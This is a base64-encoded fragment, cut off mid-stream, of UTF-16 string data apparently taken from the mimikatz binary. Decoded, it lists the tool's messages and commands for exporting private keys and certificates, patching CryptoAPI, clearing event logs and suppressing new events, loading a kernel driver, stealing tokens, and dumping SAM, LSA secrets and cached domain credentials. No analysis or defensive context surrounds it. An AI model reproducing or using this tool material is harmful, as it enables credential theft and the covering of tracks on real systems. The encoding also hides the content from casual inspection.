AKQAKAAAAAABNAHkAAAAAAHMAdABvAHIAZQAAACAAKgAgAFMAeQBzAHQAZQBtACAAUwB0AG8AcgBlACAAIAA6ACAAJwAlAHMAJwAgACgAMAB4ACUAMAA4AHgAKQAKACAAKgAgAFMAdABvAHIAZQAgACAAIAAgACAAIAAgACAAIAA6ACAAJwAlAHMAJwAKAAoAAAAAACgAbgB1AGwAbAApAAAAAAAJAEsAZQB5ACAAQwBvAG4AdABhAGkAbgBlAHIAIAAgADoAIAAlAHMACgAJAFAAcgBvAHYAaQBkAGUAcgAgACAAIAAgACAAIAAgADoAIAAlAHMACgAAAAAACQBUAHkAcABlACAAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAJQBzACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBsAF8AYwBlAHIAdABpAGYAaQBjAGEAdABlAHMAIAA7ACAAQwByAHkAcAB0AEcAZQB0AFUAcwBlAHIASwBlAHkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBjAGUAcgB0AGkAZgBpAGMAYQB0AGUAcwAgADsAIABrAGUAeQBTAHAAZQBjACAAPQA9ACAAQwBFAFIAVABfAE4AQwBSAFkAUABUAF8ASwBFAFkAXwBTAFAARQBDACAAdwBpAHQAaABvAHUAdAAgAEMATgBHACAASABhAG4AZABsAGUAIAA/AAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBsAF8AYwBlAHIAdABpAGYAaQBjAGEAdABlAHMAIAA7ACAAQwByAHkAcAB0AEEAYwBxAHUAaQByAGUAQwBlAHIAdABpAGYAaQBjAGEAdABlAFAAcgBpAHYAYQB0AGUASwBlAHkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBsAF8AYwBlAHIAdABpAGYAaQBjAGEAdABlAHMAIAA7ACAAQwBlAHIAdABHAGUAdABDAGUAcgB0AGkAZgBpAGMAYQB0AGUAQwBvAG4AdABlAHgAdABQAHIAbwBwAGUAcgB0AHkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBsAF8AYwBlAHIAdABpAGYAaQBjAGEAdABlAHMAIAA7ACAAQwBlAHIAdABHAGUAdABOAGEAbQBlAFMAdAByAGkAbgBnACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AbABfAGMAZQByAHQAaQBmAGkAYwBhAHQAZQBzACAAOwAgAEMAZQByAHQARwBlAHQATgBhAG0AZQBTAHQAcgBpAG4AZwAgACgAZgBvAHIAIABsAGUAbgApACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBsAF8AYwBlAHIAdABpAGYAaQBjAGEAdABlAHMAIAA7ACAAQwBlAHIAdABPAHAAZQBuAFMAdABvAHIAZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABwAHIAbwB2AGkAZABlAHIAAAAAAHAAcgBvAHYAaQBkAGUAcgB0AHkAcABlAAAAAABtAGEAYwBoAGkAbgBlAAAAAAAAAE0AaQBjAHIAbwBzAG8AZgB0ACAAUwBvAGYAdAB3AGEAcgBlACAASwBlAHkAIABTAHQAbwByAGEAZwBlACAAUAByAG8AdgBpAGQAZQByAAAAYwBuAGcAcAByAG8AdgBpAGQAZQByAAAAIAAqACAAUwB0AG8AcgBlACAAIAAgACAAIAAgACAAIAAgADoAIAAnACUAcwAnAAoAIAAqACAAUAByAG8AdgBpAGQAZQByACAAIAAgACAAIAAgADoAIAAnACUAcwAnACAAKAAnACUAcwAnACkACgAgACoAIABQAHIAbwB2AGkAZABlAHIAIAB0AHkAcABlACAAOgAgACcAJQBzACcAIAAoACUAdQApAAoAIAAqACAAQwBOAEcAIABQAHIAbwB2AGkAZABlAHIAIAAgADoAIAAnACUAcwAnAAoAAAAAAAoAQwByAHkAcAB0AG8AQQBQAEkAIABrAGUAeQBzACAAOgAKAAAAAAAKACUAMgB1AC4AIAAlAHMACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBsAF8AawBlAHkAcwAgADsAIABDAHIAeQBwAHQARwBlAHQAVQBzAGUAcgBLAGUAeQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AbABfAGsAZQB5AHMAIAA7ACAAQwByAHkAcAB0AEcAZQB0AFAAcgBvAHYAUABhAHIAYQBtACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAoAQwBOAEcAIABrAGUAeQBzACAAOgAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AbABfAGsAZQB5AHMAIAA7ACAATgBDAHIAeQBwAHQATwBwAGUAbgBLAGUAeQAgACUAMAA4AHgACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBsAF8AawBlAHkAcwAgADsAIABOAEMAcgB5AHAAdABFAG4AdQBtAEsAZQB5AHMAIAAlADAAOAB4AAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBrAGUAeQBzACAAOwAgAE4AQwByAHkAcAB0AE8AcABlAG4AUwB0AG8AcgBhAGcAZQBQAHIAbwB2AGkAZABlAHIAIAAlADAAOAB4AAoAAAAAAEUAeABwAG8AcgB0ACAAUABvAGwAaQBjAHkAAABMAGUAbgBnAHQAaAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAHAAcgBpAG4AdABLAGUAeQBJAG4AZgBvAHMAIAA7ACAATgBDAHIAeQBwAHQARwBlAHQAUAByAG8AcABlAHIAdAB5ACAAKAAwAHgAJQAwADgAeAApAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AcAByAGkAbgB0AEsAZQB5AEkAbgBmAG8AcwAgADsAIABDAHIAeQBwAHQARwBlAHQASwBlAHkAUABhAHIAYQBtACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAFkARQBTAAAATgBPAAAAAAAJAEUAeABwAG8AcgB0AGEAYgBsAGUAIABrAGUAeQAgADoAIAAlAHMACgAJAEsAZQB5ACAAcwBpAHoAZQAgACAAIAAgACAAIAAgADoAIAAlAHUACgAAAAAAcAB2AGsAAABDAEEAUABJAFAAUgBJAFYAQQBUAEUAQgBMAE8AQgAAAE8ASwAAAAAASwBPAAAAAAAJAFAAcgBpAHYAYQB0AGUAIABlAHgAcABvAHIAdAAgADoAIAAlAHMAIAAtACAAAAAnACUAcwAnAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGUAeABwAG8AcgB0AEsAZQB5AFQAbwBGAGkAbABlACAAOwAgAEUAeABwAG8AcgB0ACAALwAgAEMAcgBlAGEAdABlAEYAaQBsAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBlAHgAcABvAHIAdABLAGUAeQBUAG8ARgBpAGwAZQAgADsAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AZwBlAG4AZQByAGEAdABlAEYAaQBsAGUATgBhAG0AZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABkAGUAcgAAAAkAUAB1AGIAbABpAGMAIABlAHgAcABvAHIAdAAgACAAOgAgACUAcwAgAC0AIAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBlAHgAcABvAHIAdABDAGUAcgB0ACAAOwAgAEMAcgBlAGEAdABlAEYAaQBsAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AZQB4AHAAbwByAHQAQwBlAHIAdAAgADsAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AZwBlAG4AZQByAGEAdABlAEYAaQBsAGUATgBhAG0AZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAcABmAHgAAABtAGkAbQBpAGsAYQB0AHoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBlAHgAcABvAHIAdABDAGUAcgB0ACAAOwAgAEUAeABwAG8AcgB0ACAALwAgAEMAcgBlAGEAdABlAEYAaQBsAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAJQBzAF8AJQBzAF8AJQB1AF8AJQBzAC4AJQBzAAAAAABBAFQAXwBLAEUAWQBFAFgAQwBIAEEATgBHAEUAAAAAAEEAVABfAFMASQBHAE4AQQBUAFUAUgBFAAAAAABDAE4ARwAgAEsAZQB5AAAAcgBzAGEAZQBuAGgALgBkAGwAbAAAAAAATABvAGMAYQBsACAAQwByAHkAcAB0AG8AQQBQAEkAIABwAGEAdABjAGgAZQBkAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBwAF8AYwBhAHAAaQAgADsAIABrAHUAbABsAF8AbQBfAHAAYQB0AGMAaAAgACgAMAB4ACUAMAA4AHgAKQAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAHAAXwBjAGEAcABpACAAOwAgAGsAdQBsAGwAXwBtAF8AcAByAG8AYwBlAHMAcwBfAGcAZQB0AFYAZQByAHkAQgBhAHMAaQBjAE0AbwBkAHUAbABlAEkAbgBmAG8AcgBtAGEAdABpAG8AbgBzAEYAbwByAE4AYQBtAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAG4AYwByAHkAcAB0AC4AZABsAGwAAAAAAG4AYwByAHkAcAB0AHAAcgBvAHYALgBkAGwAbAAAAAAASwBlAHkASQBzAG8AAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBwAF8AYwBuAGcAIAA7ACAATgBvACAAQwBOAEcACgAAAEMAbABlAGEAcgAgAGEAbgAgAGUAdgBlAG4AdAAgAGwAbwBnAAAAAABjAGwAZQBhAHIAAAAAAAAAWwBlAHgAcABlAHIAaQBtAGUAbgB0AGEAbABdACAAcABhAHQAYwBoACAARQB2AGUAbgB0AHMAIABzAGUAcgB2AGkAYwBlACAAdABvACAAYQB2AG8AaQBkACAAbgBlAHcAIABlAHYAZQBuAHQAcwAAAGQAcgBvAHAAAAAAAEUAdgBlAG4AdAAgAG0AbwBkAHUAbABlAAAAAABlAHYAZQBuAHQAAABsAG8AZwAAAGUAdgBlAG4AdABsAG8AZwAuAGQAbABsAAAAAAB3AGUAdgB0AHMAdgBjAC4AZABsAGwAAABFAHYAZQBuAHQATABvAGcAAAAAAFMAZQBjAHUAcgBpAHQAeQAAAAAAVQBzAGkAbgBnACAAIgAlAHMAIgAgAGUAdgBlAG4AdAAgAGwAbwBnACAAOgAKAAAALQAgACUAdQAgAGUAdgBlAG4AdAAoAHMAKQAKAAAAAAAtACAAQwBsAGUAYQByAGUAZAAgACEACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AZQB2AGUAbgB0AF8AYwBsAGUAYQByACAAOwAgAEMAbABlAGEAcgBFAHYAZQBuAHQATABvAGcAIAAoADAAeAAlADAAOAB4ACkACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBlAHYAZQBuAHQAXwBjAGwAZQBhAHIAIAA7ACAATwBwAGUAbgBFAHYAZQBuAHQATABvAGcAIAAoADAAeAAlADAAOAB4ACkACgAAAEwAaQBzAHQAIABtAGkAbgBpAGYAaQBsAHQAZQByAHMAAAAAAG0AaQBuAGkAZgBpAGwAdABlAHIAcwAAAEwAaQBzAHQAIABGAFMAIABmAGkAbAB0AGUAcgBzAAAAZgBpAGwAdABlAHIAcwAAAFIAZQBtAG8AdgBlACAAbwBiAGoAZQBjAHQAIABuAG8AdABpAGYAeQAgAGMAYQBsAGwAYgBhAGMAawAAAG4AbwB0AGkAZgBPAGIAagBlAGMAdABSAGUAbQBvAHYAZQAAAFIAZQBtAG8AdgBlACAAcAByAG8AYwBlAHMAcwAgAG4AbwB0AGkAZgB5ACAAYwBhAGwAbABiAGEAYwBrAAAAAABuAG8AdABpAGYAUAByAG8AYwBlAHMAcwBSAGUAbQBvAHYAZQAAAAAATABpAHMAdAAgAG8AYgBqAGUAYwB0ACAAbgBvAHQAaQBmAHkAIABjAGEAbABsAGIAYQBjAGsAcwAAAAAAbgBvAHQAaQBmAE8AYgBqAGUAYwB0AAAATABpAHMAdAAgAHIAZQBnAGkAcwB0AHIAeQAgAG4AbwB0AGkAZgB5ACAAYwBhAGwAbABiAGEAYwBrAHMAAAAAAG4AbwB0AGkAZgBSAGUAZwAAAAAATABpAHMAdAAgAGkAbQBhAGcAZQAgAG4AbwB0AGkAZgB5ACAAYwBhAGwAbABiAGEAYwBrAHMAAABuAG8AdABpAGYASQBtAGEAZwBlAAAAAABMAGkAcwB0ACAAdABoAHIAZQBhAGQAIABuAG8AdABpAGYAeQAgAGMAYQBsAGwAYgBhAGMAawBzAAAAAABuAG8AdABpAGYAVABoAHIAZQBhAGQAAABMAGkAcwB0ACAAcAByAG8AYwBlAHMAcwAgAG4AbwB0AGkAZgB5ACAAYwBhAGwAbABiAGEAYwBrAHMAAABuAG8AdABpAGYAUAByAG8AYwBlAHMAcwAAAAAATABpAHMAdAAgAFMAUwBEAFQAAABzAHMAZAB0AAAAAABMAGkAcwB0ACAAbQBvAGQAdQBsAGUAcwAAAAAAbQBvAGQAdQBsAGUAcwAAAFMAZQB0ACAAYQBsAGwAIABwAHIAaQB2AGkAbABlAGcAZQAgAG8AbgAgAHAAcgBvAGMAZQBzAHMAAAAAAHAAcgBvAGMAZQBzAHMAUAByAGkAdgBpAGwAZQBnAGUAAAAAAEQAdQBwAGwAaQBjAGEAdABlACAAcAByAG8AYwBlAHMAcwAgAHQAbwBrAGUAbgAAAHAAcgBvAGMAZQBzAHMAVABvAGsAZQBuAAAAAABQAHIAbwB0AGUAYwB0ACAAcAByAG8AYwBlAHMAcwAAAHAAcgBvAGMAZQBzAHMAUAByAG8AdABlAGMAdAAAAAAAQgBTAE8ARAAgACEAAAAAAGIAcwBvAGQAAAAAAFAAaQBuAGcAIAB0AGgAZQAgAGQAcgBpAHYAZQByAAAAcABpAG4AZwAAAAAAAAAAAFIAZQBtAG8AdgBlACAAbQBpAG0AaQBrAGEAdAB6ACAAZAByAGkAdgBlAHIAIAAoAG0AaQBtAGkAZAByAHYAKQAAAAAALQAAAEkAbgBzAHQAYQBsAGwAIABhAG4AZAAvAG8AcgAgAHMAdABhAHIAdAAgAG0AaQBtAGkAawBhAHQAegAgAGQAcgBpAHYAZQByACAAKABtAGkAbQBpAGQAcgB2ACkAAAAAACsAAAByAGUAbQBvAHYAZQAAAAAATABpAHMAdAAgAHAAcgBvAGMAZQBzAHMAAAAAAHAAcgBvAGMAZQBzAHMAAABtAGkAbQBpAGQAcgB2AC4AcwB5AHMAAABtAGkAbQBpAGQAcgB2AAAAWwArAF0AIABtAGkAbQBpAGsAYQB0AHoAIABkAHIAaQB2AGUAcgAgAGEAbAByAGUAYQBkAHkAIAByAGUAZwBpAHMAdABlAHIAZQBkAAoAAABbACoAXQAgAG0AaQBtAGkAawBhAHQAegAgAGQAcgBpAHYAZQByACAAbgBvAHQAIABwAHIAZQBzAGUAbgB0AAoAAAAAAG0AaQBtAGkAawBhAHQAegAgAGQAcgBpAHYAZQByACAAKABtAGkAbQBpAGQAcgB2ACkAAABbACsAXQAgAG0AaQBtAGkAawBhAHQAegAgAGQAcgBpAHYAZQByACAAcwB1AGMAYwBlAHMAcwBmAHUAbABsAHkAIAByAGUAZwBpAHMAdABlAHIAZQBkAAoAAAAAAAAAAABbACsAXQAgAG0AaQBtAGkAawBhAHQAegAgAGQAcgBpAHYAZQByACAAQQBDAEwAIAB0AG8AIABlAHYAZQByAHkAbwBuAGUACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAbgBlAGwAXwBhAGQAZABfAG0AaQBtAGkAZAByAHYAIAA7ACAAawB1AGgAbABfAG0AXwBrAGUAcgBuAGUAbABfAGEAZABkAFcAbwByAGwAZABUAG8ATQBpAG0AaQBrAGEAdAB6ACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAG4AZQBsAF8AYQBkAGQAXwBtAGkAbQBpAGQAcgB2ACAAOwAgAEMAcgBlAGEAdABlAFMAZQByAHYAaQBjAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAG4AZQBsAF8AYQBkAGQAXwBtAGkAbQBpAGQAcgB2ACAAOwAgAGsAdQBsAGwAXwBtAF8AZgBpAGwAZQBfAGkAcwBGAGkAbABlAEUAeABpAHMAdAAgACgAMAB4ACUAMAA4AHgAKQAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBuAGUAbABfAGEAZABkAF8AbQBpAG0AaQBkAHIAdgAgADsAIABrAHUAbABsAF8AbQBfAGYAaQBsAGUAXwBnAGUAdABBAGIAcwBvAGwAdQB0AGUAUABhAHQAaABPAGYAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAG4AZQBsAF8AYQBkAGQAXwBtAGkAbQBpAGQAcgB2ACAAOwAgAE8AcABlAG4AUwBlAHIAdgBpAGMAZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAWwArAF0AIABtAGkAbQBpAGsAYQB0AHoAIABkAHIAaQB2AGUAcgAgAHMAdABhAHIAdABlAGQACgAAAAAAAAAAAFsAKgBdACAAbQBpAG0AaQBrAGEAdAB6ACAAZAByAGkAdgBlAHIAIABhAGwAcgBlAGEAZAB5ACAAcwB0AGEAcgB0AGUAZAAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBuAGUAbABfAGEAZABkAF8AbQBpAG0AaQBkAHIAdgAgADsAIABTAHQAYQByAHQAUwBlAHIAdgBpAGMAZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBuAGUAbABfAGEAZABkAF8AbQBpAG0AaQBkAHIAdgAgADsAIABPAHAAZQBuAFMAQwBNAGEAbgBhAGcAZQByACgAYwByAGUAYQB0AGUAKQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAWwArAF0AIABtAGkAbQBpAGsAYQB0AHoAIABkAHIAaQB2AGUAcgAgAHMAdABvAHAAcABlAGQACgAAAAAAWwAqAF0AIABtAGkAbQBpAGsAYQB0AHoAIABkAHIAaQB2AGUAcgAgAG4AbwB0ACAAcgB1AG4AbgBpAG4AZwAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBuAGUAbABfAHIAZQBtAG8AdgBlAF8AbQBpAG0AaQBkAHIAdgAgADsAIABrAHUAbABsAF8AbQBfAHMAZQByAHYAaQBjAGUAXwBzAHQAbwBwACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAFsAKwBdACAAbQBpAG0AaQBrAGEAdAB6ACAAZAByAGkAdgBlAHIAIAByAGUAbQBvAHYAZQBkAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAG4AZQBsAF8AcgBlAG0AbwB2AGUAXwBtAGkAbQBpAGQAcgB2ACAAOwAgAGsAdQBsAGwAXwBtAF8AcwBlAHIAdgBpAGMAZQBfAHIAZQBtAG8AdgBlACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAFAAcgBvAGMAZQBzAHMAIAA6ACAAJQBzAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAG4AZQBsAF8AcAByAG8AYwBlAHMAcwBQAHIAbwB0AGUAYwB0ACAAOwAgAGsAdQBsAGwAXwBtAF8AcAByAG8AYwBlAHMAcwBfAGcAZQB0AFAAcgBvAGMAZQBzAHMASQBkAEYAbwByAE4AYQBtAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAHAAaQBkAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAbgBlAGwAXwBwAHIAbwBjAGUAcwBzAFAAcgBvAHQAZQBjAHQAIAA7ACAAQQByAGcAdQBtAGUAbgB0ACAALwBwAHIAbwBjAGUAcwBzADoAcAByAG8AZwByAGEAbQAuAGUAeABlACAAbwByACAALwBwAGkAZAA6AHAAcgBvAGMAZQBzAHMAaQBkACAAbgBlAGUAZABlAGQACgAAAAAAAAAAAFAASQBEACAAJQB1ACAALQA+ACAAJQAwADIAeAAvACUAMAAyAHgAIABbACUAMQB4AC0AJQAxAHgALQAlADEAeABdAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAbgBlAGwAXwBwAHIAbwBjAGUAcwBzAFAAcgBvAHQAZQBjAHQAIAA7ACAATgBvACAAUABJAEQACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAbgBlAGwAXwBwAHIAbwBjAGUAcwBzAFAAcgBvAHQAZQBjAHQAIAA7ACAAUAByAG8AdABlAGMAdABlAGQAIABwAHIAbwBjAGUAcwBzACAAbgBvAHQAIABhAHYAYQBpAGwAYQBiAGwAZQAgAGIAZQBmAG8AcgBlACAAVwBpAG4AZABvAHcAcwAgAFYAaQBzAHQAYQAKAAAAAABmAHIAbwBtAAAAAAB0AG8AAAAAAAAAAABUAG8AawBlAG4AIABmAHIAbwBtACAAcAByAG8AYwBlAHMAcwAgACUAdQAgAHQAbwAgAHAAcgBvAGMAZQBzAHMAIAAlAHUACgAAAAAAAAAAACAAKgAgAGYAcgBvAG0AIAAwACAAdwBpAGwAbAAgAHQAYQBrAGUAIABTAFkAUwBUAEUATQAgAHQAbwBrAGUAbgAKAAAAAAAAACAAKgAgAHQAbwAgADAAIAB3AGkAbABsACAAdABhAGsAZQAgAGEAbABsACAAJwBjAG0AZAAnACAAYQBuAGQAIAAnAG0AaQBtAGkAawBhAHQAegAnACAAcAByAG8AYwBlAHMAcwAKAAAAVABhAHIAZwBlAHQAIAA9ACAAMAB4ACUAcAAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAG4AZQBsAF8AbgBvAHQAaQBmAHkARwBlAG4AZQByAGkAYwBSAGUAbQBvAHYAZQAgADsAIABOAG8AIABhAGQAZAByAGUAcwBzAD8ACgAAAAAASwBlAHIAYgBlAHIAbwBzAC0ATgBlAHcAZQByAC0ASwBlAHkAcwAAAEsAZQByAGIAZQByAG8AcwAAAAAAVwBEAGkAZwBlAHMAdAAAAEMATABFAEEAUgBUAEUAWABUAAAAUAByAGkAbQBhAHIAeQAAAGsAZQByAG4AZQBsADMAMgAuAGQAbABsAAAAAABuAHQAZABsAGwALgBkAGwAbAAAAGwAcwBhAHMAcgB2AC4AZABsAGwAAAAAAHMAYQBtAHMAcgB2AC4AZABsAGwAAAAAAEQAYQB0AGEAAAAAAEcAQgBHAAAAUwBrAGUAdwAxAAAASgBEAAAAAABEAGUAZgBhAHUAbAB0AAAAQwB1AHIAcgBlAG4AdAAAAEEAcwBrACAATABTAEEAIABTAGUAcgB2AGUAcgAgAHQAbwAgAHIAZQB0AHIAaQBlAHYAZQAgAFMAQQBNAC8AQQBEACAAZQBuAHQAcgBpAGUAcwAgACgAbgBvAHIAbQBhAGwALAAgAHAAYQB0AGMAaAAgAG8AbgAgAHQAaABlACAAZgBsAHkAIABvAHIAIABpAG4AagBlAGMAdAApAAAAAABsAHMAYQAAAEcAZQB0ACAAdABoAGUAIABTAHkAcwBLAGUAeQAgAHQAbwAgAGQAZQBjAHIAeQBwAHQAIABOAEwAJABLAE0AIAB0AGgAZQBuACAATQBTAEMAYQBjAGgAZQAoAHYAMgApACAAKABmAHIAbwBtACAAcgBlAGcAaQBzAHQAcgB5ACAAbwByACAAaABpAHYAZQBzACkAAABjAGEAYwBoAGUAAABHAGUAdAAgAHQAaABlACAAUwB5AHMASwBlAHkAIAB0AG8AIABkAGUAYwByAHkAcAB0ACAAUwBFAEMAUgBFAFQAUwAgAGUAbgB0AHIAaQBlAHMAIAAoAGYAcgBvAG0AIAByAGUAZwBpAHMAdAByAHkAIABvAHIAIABoAGkAdgBlAHMAKQAAAAAAcwBlAGMAcgBlAHQAcwAAAEcAZQB0ACAAdABoAGUAIABTAHkAcwBLAGUAeQAgAHQAbwAgAGQAZQBjAHIAeQBwAHQAIABTAEEATQAgAGUAbgB0AHIAaQBlAHMAIAAoAGYAcgBvAG0AIAByAGUAZwBpAHMAdAByAHkAIABvAHIAIABoAGkAdgBlAHMAKQAAAAAAcwBhAG0AAABMAHMAYQBEAHUAbQBwACAAbQBvAGQAdQBsAGUAAAAAAGwAcwBhAGQAdQBtAHAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBzAGEAbQAgADsAIABDAHIAZQBhAHQAZQBGAGkAbABlACAAKABTAFkAUwBUAEUATQAgAGgAaQB2AGUAKQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAHMAYQBtACAAOwAgAEMAcgBlAGEAdABlAEYAaQBsAGUAIAAoAFMAQQBNACAAaABpAHYAZQApACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAFMAWQBTAFQARQBNAAAAAABTAEEATQAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAHMAYQBtACAAOwAgAGsAdQBsAGwAXwBtAF8AcgBlAGcAaQBzAHQAcgB5AF8AUgBlAGcATwBwAGUAbgBLAGUAeQBFAHgAIAAoAFMAQQBNACkAIAAoADAAeAAlADAAOAB4ACkACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAHMAZQBjAHIAZQB0AHMATwByAEMAYQBjAGgAZQAgADsAIABDAHIAZQBhAHQAZQBGAGkAbABlACAAKABTAEUAQwBVAFIASQBUAFkAIABoAGkAdgBlACkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AcwBlAGMAcgBlAHQAcwBPAHIAQwBhAGMAaABlACAAOwAgAEMAcgBlAGEAdABlAEYAaQBsAGUAIAAoAFMAWQBTAFQARQBNACAAaABpAHYAZQApACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAFMARQBDAFUAUgBJAFQAWQAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AcwBlAGMAcgBlAHQAcwBPAHIAQwBhAGMAaABlACAAOwAgAGsAdQBsAGwAXwBtAF8AcgBlAGcAaQBzAHQAcgB5AF8AUgBlAGcATwBwAGUAbgBLAGUAeQBFAHgAIAAoAFMARQBDAFUAUgBJAFQAWQApACAAKAAwAHgAJQAwADgAeAApAAoAAABDAG8AbgB0AHIAbwBsAFMAZQB0ADAAMAAwAAAAUwBlAGwAZQBjAHQAAAAAACUAMAAzAHUAAAAAACUAeAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AZwBlAHQAUwB5AHMAawBlAHkAIAA7ACAATABTAEEAIABLAGUAeQAgAEMAbABhAHMAcwAgAHIAZQBhAGQAIABlAHIAcgBvAHIACgAAAAAARABvAG0AYQBpAG4AIAA6ACAAAAAAAAAAQwBvAG4AdAByAG8AbABcAEMAbwBtAHAAdQB0AGUAcgBOAGEAbQBlAFwAQwBvAG0AcAB1AHQAZQByAE4AYQBtAGUAAABDAG8AbQBwAHUAdABlAHIATgBhAG0AZQAAAAAAJQBzAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBnAGUAdABDAG8AbQBwAHUAdABlAHIAQQBuAGQAUwB5AHMAawBlAHkAIAA7ACAAawB1AGwAbABfAG0AXwByAGUAZwBpAHMAdAByAHkAXwBSAGUAZwBRAHUAZQByAHkAVgBhAGwAdQBlAEUAeAAgAEMAbwBtAHAAdQB0AGUAcgBOAGEAbQBlACAASwBPAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBnAGUAdABDAG8AbQBwAHUAdABlAHIAQQBuAGQAUwB5AHMAawBlAHkAIAA7ACAAcAByAGUAIAAtACAAawB1AGwAbABfAG0AXwByAGUAZwBp